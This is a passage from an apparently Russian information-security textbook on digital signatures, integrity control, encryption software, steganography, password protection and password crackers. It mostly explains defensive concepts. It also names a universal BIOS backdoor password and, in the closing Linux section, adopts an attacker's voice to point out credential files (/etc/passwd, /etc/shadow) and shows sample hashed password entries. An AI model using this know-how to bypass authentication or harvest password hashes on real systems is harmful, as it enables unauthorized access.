Далее к полученному значению хеш-функции применяют то или
иное математическое преобразование (в зависимости от выбранного ал-
горитма ЭЦП) и получают собственно подпись документа. Эта подпись
может иметь вполне читаемый, "буквенный" вид, но зачастую ее пред-
ставляют в виде последовательности произвольных "нечитаемых" сим
волов. ЭЦП может храниться вместе с документом, например, стоять в
его начале или конце, либо в отдельном файле. Естественно, в послед
123
нем случае при проверке подписи необходимо располагать как самим
документом, так и файлом, содержащим его подпись.
Проверка подписи. При проверке подписи проверяющий должен
располагать открытым ключом абонента, поставившего подпись. Этот
ключ должен быть аутентифицирован, то есть проверяющий должен
быть полностью уверен, что данный открытый ключ соответствует тому
абоненту, который выдает себя за его "хозяина". В случае, когда абонен-
ты самостоятельно обмениваются ключами, эта уверенность может под-
крепляться связью по телефону, личным контактом или любым другим
способом. В случае, когда абоненты действуют в сети с выделенным
центром, открытые ключи абонентов подписываются (сертифицируют-
ся) центром, и непосредственный контакт абонентов между собой (при
передаче или подтверждении подлинности ключей) заменяется на кон
такт каждого из них в отдельности с центром.
Процедура проверки ЭЦП состоит из двух этапов: вычисления хеш-
функции документа и собственно математических вычислений, преду-
смотренных в данном алгоритме подписи. Последние заключаются в
проверке того или иного соотношения, связывающего хеш-функцию до-
кумента, подпись под этим документом и открытый ключ подписавшего
абонента. Если рассматриваемое соотношение оказывается выполнен-
ным, то подпись признается правильной, а сам документ– подлинным, в
противоположном случае документ считается измененным, а подпись
под ним – недействительной.
3.2.2. Контроль целостности
Криптографические методы позволяют надежно контролировать

целостность как отдельных порций данных, так и их наборов (таких как
поток сообщений); определять подлинность источника данных; гаранти-
ровать невозможность отказаться от совершенных действий ("неотказу-
емость").
В основе криптографического контроля целостности лежат два по-
нятия:
хэш-функция;
электронная цифровая подпись (ЭЦП).
Хэш-функция – это труднообратимое преобразование данных (од-
носторонняя функция), реализуемое, как правило, средствами симмет-
ричного шифрования со связыванием блоков. Результат шифрования по-
следнего блока (зависящий от всех предыдущих) и служит результатом
хэш-функции.
124
Пусть имеются данные, целостность которых нужно проверить,
хэш-функция и ранее вычисленный результат ее применения к исход-
ным данным (так называемый дайджест). Обозначим хэш-функцию че-
рез h, исходные данные – через T, проверяемые данные – через T'. Кон-
троль целостности данных сводится к проверке равенства h(T') = h(T).
Если оно выполнено, считается, что T' = T. Совпадение дайджестов для
различных данных называется коллизией. В принципе, коллизии, конеч-
но, возможны, поскольку мощность множества дайджестов меньше, чем
мощность множества хэшируемых данных, однако то, что h есть функ-
ция односторонняя, означает, что за приемлемое время специально ор-
ганизовать коллизию невозможно.
Рассмотрим теперь применение асимметричного шифрования для
выработки и проверки электронной цифровой подписи. Пусть E(T)
обозначает результат зашифрования текста T с помощью открытого клю-
ча, а D(T) – результат расшифрования текста Т (как правило, шифрован-
ного) с помощью секретного ключа. Чтобы асимметричный метод мог
применяться для реализации ЭЦП, необходимо выполнение тождества
E(D(T))=D(E(T))=T (3)
На рис. 23. показана процедура выработки электронной цифровой

подписи, состоящая в шифровании преобразованием D дайджеста h(T).
Рис. 23. Выработка электронной цифровой подписи.

Проверка ЭЦП может быть реализована так, как показано на рис. 24.
Из равенства
E(S') = h(T'), (4)
следует, что S' = D(h(T') (для доказательства достаточно применить к
обеим частям преобразование D и вычеркнуть в левой части тожде-
125
ственное преобразование D(E())). Таким образом, электронная цифровая
подпись защищает целостность сообщения и удостоверяет личность от-
правителя, то есть защищает целостность источника данных и служит
основой неотказуемости.
Рис. 24. Проверка электронной цифровой подписи

Два российских стандарта, ГОСТ Р 34.10-94 "Процедуры выработки
и проверки электронной цифровой подписи на базе асимметричного
криптографического алгоритма" и ГОСТ Р 34.11-94 "Функция хэширо-
вания", объединенные общим заголовком "Информационная технология.
Криптографическая защита информации", регламентируют вычисление
дайджеста и реализацию ЭЦП. В сентябре 2001 года был утвержден, а 1
июля 2002 года вступил в силу новый стандарт ЭЦП – ГОСТ Р 34.10-
2001, разработанный специалистами ФАПСИ.
Для контроля целостности последовательности сообщений (то есть
для защиты от кражи, дублирования и переупорядочения сообщений)
применяют временные штампы и нумерацию элементов последователь-
ности, при этом штампы и номера включают в подписываемый текст.
Цифровые сертификаты
При использовании асимметричных методов шифрования (и, в
частности, электронной цифровой подписи) необходимо иметь гарантию
подлинности пары (имя пользователя, открытый ключ пользователя).
Для решения этой задачи в спецификациях X.509 вводятся понятия
цифрового сертификата и удостоверяющего центра.
Удостоверяющий центр – это компонент глобальной службы ка-
талогов, отвечающий за управление криптографическими ключами
пользователей. Открытые ключи и другая информация о пользователях
хранится удостоверяющими центрами в виде цифровых сертификатов,
имеющих следующую структуру:
126
порядковый номер сертификата;
идентификатор алгоритма электронной подписи;
имя удостоверяющего центра;
срок годности;
имя владельца сертификата (имя пользователя, которому принад-
лежит сертификат);
открытые ключи владельца сертификата (ключей может быть не-
сколько);
идентификаторы алгоритмов, ассоциированных с открытыми
ключами владельца сертификата;
электронная подпись, сгенерированная с использованием секрет-
ного ключа удостоверяющего центра (подписывается результат
хэширования всей информации, хранящейся в сертификате).
Цифровые сертификаты обладают следующими свойствами:
любой пользователь, знающий открытый ключ удостоверяющего
центра, может узнать открытые ключи других клиентов центра и
проверить целостность сертификата;
никто, кроме удостоверяющего центра, не может модифициро-
вать информацию о пользователе без нарушения целостности
сертификата.
В спецификациях X.509 не описывается конкретная процедура ге-
нерации криптографических ключей и управления ими, однако даются
некоторые общие рекомендации. В частности, оговаривается, что пары
ключей могут порождаться любым из следующих способов.
ключи может генерировать сам пользователь. В таком случае
секретный ключ не попадает в руки третьих лиц, однако нужно
решать задачу безопасной связи с удостоверяющим центром;
ключи генерирует доверенное лицо. В таком случае приходится
решать задачи безопасной доставки секретного ключа владельцу
и предоставления доверенных данных для создания сертификата;
ключи генерируются удостоверяющим центром. В таком случае
остается только задача безопасной передачи ключей владельцу.
Цифровые сертификаты в формате X.509 версии 3 стали не только
формальным, но и фактическим стандартом, поддерживаемым много-
численными удостоверяющими центрами.
3.2.3. Криптографические методы защиты
Возможность использования персональных компьютеров в локаль-

ных сетях (при сопряжении их с другими ПК) или применение "моде-
127
мов" для обмена информацией по телефонным проводам предъявляет
более жесткие требования к программному обеспечению по защите ин-
формации ПК. Потребители ПК в различных организациях для обмена
информацией все шире используют электронную почту, которая без до-
полнительных средств защиты может стать достоянием посторонних
лиц. Самой надежной защитой от несанкционированного доступа к пе-
редаваемой информации и программным продуктам ПК является при-
менение различных методов шифрования (криптографических методов
защиты информации).
Криптографический метод защиты, безусловно, самый надежный
метод защиты, так как охраняется непосредственно сама информация, а
не доступ к ней (например, зашифрованный файл нельзя прочесть даже
в случае кражи носителя). Данный метод защиты реализуется в виде
программ или пакетов программ, расширяющих возможности стандарт-
ной операционной системы. Защита на уровне операционной системы,
чаще всего, должна дополняться средствами защиты на уровне систем
управления базами данных, которые позволяют реализовывать сложные
процедуры управления доступом.
Подробно методы и способы криптографического преобразования
данных рассмотрены в предыдущем разделе. Здесь же отметим, что
пользователь ПК должен помнить о том, что эффективность этих мето-
дов и средств может быть снижена до минимума неправильными дей-
ствиями самого пользователя ПК.
1) Самая простая атака может быть осуществлена, если пользователь
оставит где-нибудь записанный пароль, защищающий закрытый
ключ. Если злоумышленник получит его, а затем получит доступ к
файлу с закрытым ключом, он сможет читать адресованные пользо-
вателю зашифрованные сообщения и ставить от его имени цифро-
вую подпись.
Всегда необходимо пользоваться рекомендациями по правиль-
ному выбору паролей.
2) Еще одна потенциальная проблема безопасности связана со спосо-
бом, которым большинство операционных систем удаляет файлы.
Когда пользователь шифрует файл и затем удаляет файл с исход-
ным открытым текстом, операционная система не стирает данные
физически. Она просто помечает соответствующие блоки на диске
как свободные, допуская тем самым повторное использование этого
пространства. Если злоумышленник прочитает эти блоки данных
вскоре после того, как они были помечены как свободные, он смо-
128
жет восстановить исходный текст.
Это может произойти и случайно: если из-за какого-нибудь
сбоя будут уничтожены или испорчены другие файлы, для их вос-
становления запустят программу восстановления. Эта программа
восстановит также и некоторые из ранее стертых файлов.
Единственный способ предотвратить восстановление исходно-
го открытого текста - это каким-либо образом обеспечить переза-
пись места, занимаемого удаленными файлами. Это можно осуще-
ствить, используя любую утилиту, которая способна перезаписать
все неиспользованные блоки на диске. Такими возможностями, к
примеру, обладают многие криптосистемы (Kremlin, BestCrypt и
другие).
3) Другая атака может быть предпринята с помощью специально раз-
работанного компьютерного вируса или червя, который инфициру-
ет криптографическую систему или операционную систему. Такой
гипотетический вирус может перехватывать пароль, закрытый ключ
или расшифрованное сообщение, а затем тайно сохранять их в фай-
ле или передавать по сети своему создателю.
Защита от подобных нападений подпадает под категорию об-
щих мер защиты от вирусных инфекций.
4) Существует опасность потери секретности данных в связи с тем,
что в операционных системах типа Windows используется техноло-
гия под названием "виртуальная память".
Виртуальная память позволяет запускать на компьютере
огромные программы, размер которых больше, чем объем установ-
ленных на машине полупроводниковых микросхем памяти. Опера-
ционная система сохраняет фрагменты программного обеспечения,
которые в настоящий момент не используются, на жестком диске.
Это значит, что операционная система может записать некоторые
данные, о которых пользователь думает, что они хранятся только в
оперативной памяти, на диск без его ведома.
Данные на диск записываются в особую временную область,
известную как файл подкачки. По мере того как данные становятся
нужны, они считываются обратно в оперативную память. Таким об-
разом, в каждый отдельный момент в физической памяти находится
лишь часть пользовательских программ и данных. Вся эта работа по
подкачке остается невидимой для пользователя, который лишь
слышит, как щелкает дисковод.
129
Если эта проблема беспокоит пользователей, то можно отклю-
чить механизм виртуальной памяти в операционной системе. Одна-
ко при этом потребуется больше физически установленных микро-
схем оперативной памяти, для того чтобы в нее вошло все необхо-
димое для работы прикладной программы.
5) Хорошо оснащенный злоумышленник может предпринять атаку
еще одного вида, предполагающую удаленный перехват побочного
электромагнитного излучения и наводок (сокращенно - ПЭМИН),
испускаемого компьютером. Эта дорогая и часто трудоемкая атака,
вероятно, также является более дешевой, чем криптоанализ. Соот-
ветствующим образом оборудованный автомобиль может остано-
виться рядом с зданием офиса (организации, предприятия) и изда-
лека перехватывать нажатия клавиш и сообщения, отображаемые на
мониторе. Это скомпрометирует все вводимые пароли, сообщения и
т.п. Такая атака может быть предотвращена соответствующим
экранированием всего компьютерного оборудования и сетевых ка-
белей с тем, чтобы они не испускали излучения. Кроме того можно
использовать специальные генераторы "белого шума" для защиты
от ПЭМИН.
Шифрование информации в изображении и звуке
Этот класс продуктов, называемых стеганографическими, позволяет
прятать текстовые сообщения в файлы .bmp, .gif, .wav и предназначен
для тех случаев, когда пользователь не хочет, чтобы у кого-либо созда-
лось впечатление, что он пользуетесь средствами криптографии.
При использовании таких программ внешне графический файл
остается практически неизменным, меняются лишь кое-где оттенки цве-
та. Звуковой файл также не претерпевает заметных изменений.
Метод организации связи, который собственно скрывает само нали-
чие связи, называется стеганографией.
В отличие от криптографии, когда противник может определить,
является ли передаваемое сообщение зашифрованным текстом, методы
стеганографии позволяют встраивать секретные сообщения в не вызы-
вающие подозрения файлы таким образом, чтобы невозможно было за-
подозрить существования встроенного сообщения.
Слово "стеганография" в переводе с греческого буквально означает
"тайнопись" (steganos - секрет, тайна; graphy - запись). К ней относится
огромное множество секретных средств связи, таких как невидимые
чернила, микрофотоснимки, условное расположение знаков, тайные ка-
налы и средства связи на плавающих частотах и т. д.
130
Стеганография занимает свою нишу в обеспечении безопасности:
она не заменяет, а дополняет криптографию. Сокрытие сообщения мето-
дами стеганографии значительно снижает вероятность обнаружения са-
мого факта передачи сообщения. А если это сообщение к тому же за-
шифровано, то оно имеет еще один, дополнительный, уровень защиты.
В настоящее время в связи с бурным развитием вычислительной
техники и новых каналов передачи информации появились новые стега-
нографические методы, в основе которых лежат особенности представ-
ления информации в компьютерных файлах, вычислительных сетях и т.
п. Это дает основание говорить о становлении нового направления -
компьютерной стеганографии.
Стеганография (также известная как "steg" или "stego") – это «спо-
соб написания цифр или букв, которые не понятны никому, кроме чело-
века, у которого есть ключ - cryptography». В компьютерный мир стега-
нография вошла как метод сокрытия определенного сообщения в другом
таким образом, что невозможно увидеть присутствие или смысл скрыто-
го сообщения.
В технологическом смысле – это способ сокрытия сообщения в тек-
стовом, графическом, звуковом или видеофайле.
Инструменты стеганографии
Стеганографические программы делятся на средства сокрытия со-
общений стеганографии и средства обнаружения стеганографии и уни-
чтожения первоначального сообщения - стеганализа.
Средства стеганографии
Существует несколько методов скрытой передачи информации.
Одним из них является простой метод скрытия файлов при работе в опе-
рационной системе MS-DOS. За текстовым открытым файлом записыва-
ется скрытый двоичный файл, объем которого много меньше текстового
файла. В конце текстового файла помещается метка EOF (комбинация
клавиш Control и Z). При обращении к этому текстовому файлу стан-
дартными средствами ОС считывание прекращается по достижении
метки EOF, и скрытый файл остается недоступен. Для двоичных файлов
никаких меток в конце файла не предусмотрено. Конец такого файла
определяется при обработке атрибутов, в которых хранится длина файла
в байтах. Доступ к скрытому файлу может быть получен, если файл от-
крыть как двоичный. Скрытый файл может быть зашифрован. Если кто-
то случайно обнаружит скрытый файл, то зашифрованная информация
будет воспринята как сбой в работе системы. Недостатком такого про-
131
стого способа является демаскирующее увеличение размера файла и вы-
сокая вероятность обнаружения вложенной информации.
Гораздо лучших результатов можно добиться, внедряя информацию
в мультимедийные файлы.
Графическая и звуковая информация представляются в числовом
виде. Так в графических объектах наименьший элемент изображения
может кодироваться одним байтом. В младшие разряды определенных
байтов изображения в соответствии с алгоритмом криптографического
преобразования помещаются биты скрытого файла. Если правильно по-
добрать алгоритм преобразования и изображение, на фоне которого по-
мещается скрытый файл, то человеческому глазу практически невоз-
можно отличить полученное изображение от исходного. Очень сложно
выявить скрытую информацию и с помощью специальных программ.
Наилучшим образом для внедрения скрытой информации подходят
изображения местности: фотоснимки со спутников, самолетов и т. п. С
помощью средств стеганографии могут маскироваться текст, изображе-
ние, речь, цифровая подпись, зашифрованное сообщение. Комплексное
использование стеганографии и шифрования многократно повышает
сложность решения задачи обнаружения и раскрытия конфиденциаль-
ной информации.
Рассмотрим средства сокрытия сообщения в графических файлах.
Одной из наиболее интересных программ этого класса является
InThePicture.
Внешний вид программы приведен на рис. 25.
Рис. 25. Стеганографическая программа InThePicture
132
InThePicture (http://www.intar.com/ITP) - программа, позволяющая
защитить от просмотра текстовые сообщения, внедряя их в графическое
изображение, фактически в BMP-файл. В процессе такого внедрения ис-
пользуется уникальный ключ, который можно считать ключом шифро-
вания. Графический файл, служащий носителем передаваемой информа-
ции, отсылается получателю. Последний, зная ключ, может извлечь из
него нужную информацию. Программа поддерживает механизм «drag
and drop» и снабжена довольно удобным (хотя и несколько необычным)
интерфейсом.
Результаты стеганографического сокрытия информации в графиче-
ских файлах представлены на рис. 26.
а) исходное изображение б) с внедренным сообщением

Рис. 26. Исходное изображение а) и практически неотличимое от ис-
ходного изображение с внедренным сообщением методом б)
Другими программами сокрытия сообщений в мультимедийных
файлах являются F5, SecurEngine, MP3Stego, Steganos Suite и др.
F5 была разработана Андреасом Вестфилдом (Andreas Westfield) и
работает под управлением MS DOS. Она позволяет внедрять сообщение
в файл формата JPEG. Пользователь очень легко может это сделать, сле-
дуя инструкциям мастера, указывая путь к картинке. F5 работает только
с текстовыми файлами.
SecurEngine позволяет пользователям спрятать сообщение в изоб-
ражении и (или) зашифровать его.
MP3Stego позволяет прятать данные в файлах формата MP3. Про-
цесс преобразования заключается в следующем: текстовый файл коди-
руется как звуковой в формате WAV, который затем преобразовывается
в формат MP3.
Steganos Suite – это коммерческий пакет, объединивший множество
утилит. В дополнение к функции трассировки и утилиты для уничтоже-
ния файлов программа также обладает файловым менеджером, что поз-
воляет пользователям шифровать и скрывать файлы на своем винчесте-
133
ре. Пользователь выделяет файл, который следует скрыть, и несущий
(обязательно графический или музыкальный) файл. Программа также
позволяет самим пользователям создавать файлы при помощи микрофо-
на или сканера. Если у вас нет подходящего файла, встроенный файло-
вый менеджер умеет искать нужный файл на жестком диске.
Таким образом, вышеописанными средствами можно замаскировать
передачу важного сообщения (например, содержащего боевое распоря-
жение) под пересылку «картинки» или «музыки» своему знакомому. Та-
кой прием маскировки под частную почту особенно ценен в тех частых
случаях, когда для передачи сообщения используются арендованные ка-
налы связи, в которых потенциально возможно ведение разведки про-
тивником или перехват организацией-владельцем канала.
Средства стеганализа
Методы стеганографии могут использоваться с целью незаконных,
несанкционированных или нежелательных действий со стороны леги-
тимных пользователей. С другой стороны, средства стеганографии мо-
гут быть использованы противником (например, террористической ор-
ганизацией) для передачи сообщений в сетях общего пользования.
Определение даже самого факта использования стеганографии является
весьма сложной задачей и практически единственным способом актив-
ного наблюдения за специальными файлами.
Системы обнаружения вторжения могут помочь в определении
нормального трафика и, таким образом, увидеть аномалии, например,
при передаче больших картинок по сети. Если администратор подготов-
лен к такому виду аномальной активности, то это может помочь в даль-
нейшем расследовании. Находящиеся на каждой машине системы обна-
ружения вторжения также могут помочь в обнаружении аномального
скопления изображений и видеофайлов.
Известен такой способ обнаружения стеганографических сообще-
ний, как статистический анализ, суть которого заключается в сравне-
нии частоты распределения цветов для возможного носителя скрытой
информации и ожидаемая частота распределения цветов для файла-
носителя скрытой информации.
Для JPEG-файлов существует утилита Stegdetect, которая способна
определять следы стеганографии в этих файлах. Программа Stegbreak
способна расшифровывать и находить возможную информацию в подо-
зрительном файле.
Шифрование с помощью архиваторов
134
Arj, Rar, WinZip и им подобные архиваторы позволяют создавать
защищенные паролем архивы. Этот способ защиты значительно слабее
описанных выше. Специалисты по криптографии утверждают, что в ме-
тодах шифрования, применяемых в архиваторах, содержаться "дыры",
позволяющие взломать архив не только подобрав пароль, но и другими
способами. Поэтому не следует пользоваться методом архивации файлов
с целью шифрования данных.
Защита жестких дисков, файлов и каталогов с помощью специ-
альных программ
Проблема защиты данных на жестких дисках ПК, является, пожа-
луй, самой актуальной в области защиты информации.
Одной из программ шифрования логических дисков является про-
грамма BestCrypt. Есть версии для Dos, Win 3.XX, Windows 95/98,
Windows NT. На таких дисках целесообразно хранить не только всю
секретную информацию, но и другие программы шифрования с секрет-
ными ключами.
Программа на выбор предлагает три алгоритма шифрования (DES,
GOST, BlowFish) - рекомендуется выбирать проверенные алгоритмы –
GOST или BlowFish.
Кроме создания шифрованных дисков (и всего сервиса связанного с
ними) программа позволяет полностью на физическом уровне произво-
дить шифрование дискет, что очень удобно для передачи секретной ин-
формации.
Подобных программ существует много, и все они отличаются по
своим возможностям. Поэтому необходимо подбирать их с учетом вер-
сии операционной системы и перечня необходимых функций, которые
должны быть реализованы в такой программе.
Так, например, программа Kremlin является как бы логическим до-
полнением программы BestCrypt. Она позволяет шифровать файлы и
электронную почту по многим алгоритмам, на выбор (IDEA, 3DES,
CAST и др.). Но главным ее достоинством является возможность (в за-
данные промежутки времени, или, например, при каждом выключении
компьютера) НЕВОССТАНОВИМО стирать все файлы истории, лог-
файлы, временные файлы Интернет а также все те файлы что пользова-
тель укажет. Кроме того, можно указать НЕВОССТАНОВИМОЕ обну-
ление информации на свободном месте жесткого диска и в файле вирту-
альной памяти (своп-файле) Windows.
135
В таблице 7 приведен обзор некоторых программ шифрования с
указанием алгоритма шифрования и адреса в Интернете.
Таблица 7
Обзор некоторых программ шифрования
Название
Алгоритм шифрования Адрес в Интернете
программы
Bcrypt аналог алгоритма DES
BLOWFISH, DES и ГОСТ
BestCrypt www.jetico.sci.fi
28147-89
ftp.funet.fi/pub/crypt/utilit
Cryptext RC4, SHA-1
ies/file/
Authentex-
BLOWFISH www.somarsoft.com
DataSAFE
Encrypt-lt for
DES и BLOWFISH
Win95/NT
Interscope www.interscope.ro/Black
DES
BlackBox Box
Kremlin DES, IDEA, BLOWFISH, RC4 www.mach5.com/kremlin
3.3. Парольные средства защиты

Этот класс средств защиты, на сегодняшний день, является самым
распространённым. Основной принцип работы данных систем заключа-
ется в идентификации и аутентификации пользователя ПО путём запро-
са дополнительных данных, это могут быть название фирмы и/или имя и
фамилия пользователя и его пароль либо только пароль / регистрацион-
ный код. Эта информация может запрашиваться в различных ситуациях,
например, при старте программы, по истечении срока бесплатного ис-
пользования ПО, при вызове процедуры регистрации либо в процессе
установки на ПК пользователя. Процедуры парольной защиты просты в
реализации и, поэтому, очень часто применяются производителями ПО.
Большинство парольных средств защиты использует логические меха-
низмы, сводящиеся к проверке правильности пароля / кода и запуске или
не запуске ПО, в зависимости от результатов проверки. Существуют так
же системы, шифрующие защищаемое ПО и использующие пароль или
производную от него величину как ключ дешифрации, большинство та-
ких систем использует слабые или простейшие алгоритмы шифрования,
136
нестойкие к направленным атакам. Это происходит из-за сложности
корректной реализации стойких криптоалгоритмов и нецелесообразно-
сти их применения для защиты недорогих условно-бесплатных про-
граммных продуктов, составляющих большинство ПО, использующего
парольные защиты. Лишь в последнее время разработаны парольные
СЗПО, реализующие стойкие криптоалгоритмы типа DES и RSA, они
реализованы в виде защитного модуля и вспомогательных библиотек и
устанавливаются на уже скомпилированные модули ПО.
Слабым звеном парольных защит является блок проверки правиль-
ности введённого пароля / кода. Для такой проверки можно сравнивать
введённый пароль с записанным в коде ПО правильным либо с правиль-
но сгенерированным из введённых дополнительных данных паролем.
Возможно так же сравнение производных величин от введённого и пра-
вильного паролей, например их ХЭШ-функций, в таком случае в коде
можно сохранять только производную величину, что повышает стой-
кость защиты. Путём анализа процедур проверки можно найти реальный
пароль, записанный в коде ПО, найти правильно сгенерированный па-
роль из введённых данных либо создать программу для перебора паро-
лей для определения пароля с нужной ХЭШ-суммой. Кроме того, если
средств защиты не использует шифрования, достаточно лишь принуди-
тельно изменить логику проверки для получения беспрепятственного
доступа к ПО.
Шифрующие системы более стойки к атакам, но при использовании
простейших или некорректно реализованных криптоалгоритмов есть
опасность дешифрации ПО.
Для всех парольных систем существует угроза перехвата пароля
при его вводе авторизованным пользователем. Кроме того, в большин-
стве средств защиты данного типа процедура проверки используется
лишь единожды, обычно при регистрации или установке ПО, затем си-
стема защиты просто отключается, что создаёт реальную угрозу для
НСД при незаконном копировании ПО.
Положительные стороны:
Надёжная защита от злоумышленника-непрофессионала.
Минимальные неудобства для пользователя.
Возможность передачи пароля / кода по сети.
Отсутствие конфликтов с системным и прикладным ПО и аппарат-
ным обеспечением.
Простота реализации и применения.
Низкая стоимость.
137
Отрицательные стороны:
Низкая стойкость большинства систем защиты данного типа.
Пользователю необходимо запоминать пароль / код.
3.3.1. Ограничение доступа к ресурсам информационной

системы
В простейшем случае можно воспользоваться аппаратными сред-
ствами установления пароля на запуск операционной системы ПК с по-
мощью установок в CMOS Setup. При запуске ПК на экране монитора
появляется сообщение (в зависимости от типа установленного BIOS) ви-
да:
1) Press "DEL" if you want to run Setup или
2) Press "Ctrl""Alt""Esc" if you want to run Setup (для некоторых
видов BIOS) или
3) F2 – Setup.
При нажатии клавиши "DEL" или ("Ctrl"+"Alt"-"Esc") или F2 на
экране появится меню CMOS Setup. Нужно выбрать опцию Password
Checking Option, ввести пароль, сохранить новые установки Setup
("F10", "Y") и перезапустить ПК. Теперь перед каждым запуском ком-
пьютера на экране монитора будет появляться сообщение с требованием
ввести пароль.
К сожалению, использование подобной парольной идентификации
не является надежным. Достаточно ввести универсальный пароль
(например, AWARD_SW) или отключить аккумуляторную батарею,
расположенную на материнской плате, и компьютер "забудет" все уста-
новки CMOS Setup.
Защита встроенного накопителя на жестком магнитном диске со-
ставляет одну из главных задач защиты ПК от постороннего вторжения.
Существует несколько типов программных средств, способных решить
задачи защиты:
средства защиты от любого доступа к жесткому диску;
средства защиты диска от записи/чтения;
средства контроля за обращением к диску;
средства удаления остатков секретной информации.
Защита встроенного жесткого диска обычно осуществляется путем
применения специальных паролей для идентификации пользователя (так
называемая парольная идентификация). В данном случае доступ к жест-
кому диску можно получить при правильном введении пароля при за-
138
грузке операционной системы. В противном случае загрузка системы не
произойдет, а при попытке загрузки с гибкого диска, жесткий диск ста-
новится "невидимым" для пользователя. Эффект защиты жесткого диска
в системе достигается видоизменением загрузочного сектора диска, из
которого удаляется информация о структуре диска. Такая защита весьма
эффективна, и она надежно защищает жесткий диск от рядового пользо-
вателя.
Одним из вариантов защиты жестких магнитных дисков от НСД яв-
ляется использование таких операционных систем как Windows NT. По
сравнению с Windows 95 и Windows 98 операционная система Windows
NT имеет достаточно эффективные средства по защите информации в
ПК.
Во-первых, при запуске Windows NT требует ввода пароля, и если
он будет введен неправильно, система не запустится.
Во-вторых, эта ОС имеет встроенную систему администрирования.
Администратором является владелец компьютера. Если на компьютере
работают в разное время несколько пользователей, то администратор
имеет возможность назначить права каждому пользователю по доступу к
магнитным дискам, каталогам, файлам вплоть до полного запрета поль-
зоваться информацией на каком-либо диске. Такие же права админи-
стратор может назначить и для пользователей, которые обращаются к
компьютеру из вычислительной сети.
Кроме того, администратор может просмотреть журнал событий и
выявить, что происходило на компьютере при работе других пользова-
телей.
В-третьих, имеет возможность форматировать магнитные диски в
формате NTFS. В таком случае если к компьютеру будут обращаться
пользователи, работающие в среде операционных систем, которые под-
держивают формат дисков FAT, то они вообще не увидят дисков с
NTFS.
Однако необходимо помнить о том, что применение Windows NT не
является абсолютно надежным средством защиты информации, так как
известны программные средства, разработанные хакерами, которые об-
ходят парольную защиту системы и позволяют читать диски NTFS из-
под ОС, поддерживающих формат дисков FAT.
3.3.2. Принципы работы парольных взломщиков
Криптографические алгоритмы, применяемые для шифрования па-

ролей пользователей в современных ОС, являются слишком стойкими,
139
чтобы можно было надеяться отыскать методы их дешифрования, кото-
рые окажутся более эффективными, чем тривиальный перебор возмож-
ных вариантов. Поэтому парольные взломщики иногда просто шифруют
все пароли с использованием того же самого криптографического алго-
ритма, который применяется для их засекречивания в атакуемой ОС, и
сравнивают результаты шифрования с тем, что записано в системном
файле, где находятся шифрованные пароли пользователей этой системы.
При этом в качестве вариантов паролей парольные взломщики исполь-
зуют символьные последовательности, автоматически генерируемые из
некоторого набора символов. Данный способ позволяет взломать все па-
роли, если известно их представление в зашифрованном виде и они со-
держат только символы из данного набора. Максимальное время, кото-
рое потребуется для взлома пароля Т, можно вычислить в соответствии
со следующей формулой:
N LP
T (5)
S
где N - число символов в наборе, L - предельная длина пароля, Р-

вероятность того, что пароль может быть подобран за время жизни, S -
количество проверок в секунду (зависит от операционной системы и
быстродействия компьютера, на котором производится взлом ее пароль-
ной защиты).
Из приведенной формулы видно, что за счет очень большого числа
перебираемых комбинаций, которое растет экспоненциально с увеличе-
нием числа символов в исходном наборе, такие атаки парольной защиты
ОС могут отнимать слишком много времени. Однако хорошо известно,
что большинство пользователей операционных систем особо не затруд-
няют себя выбором стойких паролей, то есть таких, которые трудно
взломать. Поэтому для более эффективного подбора паролей взломщики
обычно используют специальные словари, которые представляют собой
заранее сформированный список слов, наиболее часто используемых на
практике в качестве паролей.
3.3.3. Практика применения паролей
Фундаментальным требованием к управлению доступом в компью-

теризированной системе является способность аутентифицировать поль-
зователей.
140
Хотя ведется поиск более эффективных методов аутентификации,
аутентификация по паролям остается доминирующей.
Известно, что паролям свойственны определенные недостатки.
Компромисс между запоминаемостью пароля и требованиями безопас-
ности создает некоторые трудности для генерирования паролей. Пароли
должны выбираться из большего объема возможных вариантов и быть
трудно угадываниями.
Однако, если пароли выбираются по принципу трудного угадыва-
ния, то их также трудно запоминать. Поэтому организация должна вы-
работать такую политику применения паролей, которая уравновешивала
бы легкое запоминание и подверженность раскрытию.
Несмотря на широкое применение паролей, очень мало внимания
обращалось на характеристики их практического использования. Лите-
ратура, посвященная безопасности применения паролей, редко основы-
вается на практическом опыте. Большинство статей по этому вопросом
содержит попытки дать рекомендации пользователям, как им следует
использовать пароли, основанные на некоторых априорных предложе-
ниях. Отсюда очевидна потребность в эмпирической базе для этих пред-
ложений.
Результаты ряда исследования показали, что, несмотря на большие
старания профессионалов информационных систем привить правильное
отношение к выбору и применению паролей, пользователи продолжают
выбирать короткие, легко запоминающиеся пароли, составленные из
букв алфавита.
Хотя периодическая смена паролей - основная мера безопасно-
сти,79,5% ответственных пользователей никогда не меняют свои пароли.
Менее 5,6% из них меняют свои пароли чаще, чем раз в год.
Результаты исследований показали, что в последнее время измени-
лось отношение пользователей к безопасности компьютеризированных
информационных систем. Общая тенденция к усилению информацион-
ной безопасности привела к лучшему пониманию отдельными пользова-
телями требований безопасности и более терпимому их отношению к
организационным, административным и техническим процедурам под-
держки безопасности.
Рекомендации по повышению безопасности информационной си-
стемы при применении паролей сводятся к следующему:
 пароль должен быть достаточно длинным;
 пароль должен формироваться из смысловых элементов, способ-
ствующих его запоминанию;
141
 пароль должен содержать смесь знаков, включая специальные зна-
ки кода ASCII;
 необходима частая смена паролей;
 пароль не должен записываться на бумагу.
Хотя пароли находят широкое применение, доверие к ним как к
средству обеспечения адекватной безопасности информационной систе-
мы понижается.
3.4. Механизмы функционирования парольных кэшей

операционных систем
Под парольным кэшем понимается механизм сохранения и повтор-
ного использования паролей в системе. От обычной базы логинов дан-
ный механизм отличается именно хранением дополнительных пароль-
ных ресурсов и возможностью их использования по специальному за-
просу без участия пользователя [25].
3.4.1. Пароли в Linux
В Linux пароли шифруются в алгоритме "DES", также есть такая

фишка как "salt", это 2е любые буквы, которые являются ключом к па-
ролю, другими словами, с помощью "salt" и шифруется пароль. Подроб-
нее об этом написано в статье "пароли в UNIXе" (почитать можно на
http://www.hack-crack.com)./ Просто не хочу повторяться, да и тема у нас
сейчас другая. Пароли в большинстве случаев хранятся в следующих
файлах:
/etc/passwd
/etc/shadow
Хотя могут и лежать в каком-нибудь /etc/shadow.old или

/etc/passwd.tmp . Сделав листинг директории /etc/, сразу можно все по-
нять. Просто иногда грамотные администраторы меняют названия фай-
лов. passwd файл, это как раз то что нам надо, но в большинстве случаев
пароли хранятся в shadow (в тени). Например, вот если видим такую си-
туацию:
root:9IDv/CqdFuqWo:0:0:System Administrator:/root:/bin/csh
john:653MWdpUGN3BM:66:1:John Nikolsen, 2-nd west:/home/john:/bin/сsh
